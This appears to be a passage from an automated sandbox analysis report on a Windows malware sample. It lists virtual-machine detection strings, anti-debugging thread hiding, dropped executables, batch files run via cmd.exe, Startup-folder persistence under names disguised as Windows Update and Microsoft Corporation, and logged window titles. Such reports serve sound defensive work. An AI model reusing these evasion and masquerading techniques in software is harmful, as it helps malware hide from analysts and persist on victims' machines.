Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: RRqyIX.exe, 00000016.00000002.2612085202.0000000000A85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000B14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RRqyIX.exe, 00000001.00000002.2244767719.0000000000683000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166751955.0000000000683000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp&f%SystemRoot%\system32\mswsock.dllj
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: server.exe, 00000004.00000002.4625843367.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: server.exe, 00000004.00000002.4625843367.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.2217703436.0000000002B91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VBoxService.exe
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: RRqyIX.exe, 00000016.00000002.2612085202.0000000000A85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-VU
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWare
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166751955.0000000000657000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

API call chain: ExitProcess graph end node

graph_1-1049

Source: C:\Users\user\AppData\Local\Temp\server.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\AppData\Local\Temp\server.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "

Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 21:15:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:32:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:40:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:03:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 09:20:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 05:45:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 16:17:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 13:38:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:40:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:50:48 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:41:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 07:44:28 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:42:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 17:24:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 12:26:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:47:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 08:30:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:03:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 09:41:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 03:27:22 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 15:01:25 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/27 \| 17:28:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/19 \| 22:54:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:30:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:19:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 07:39:57 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:27:13 - Program Manager
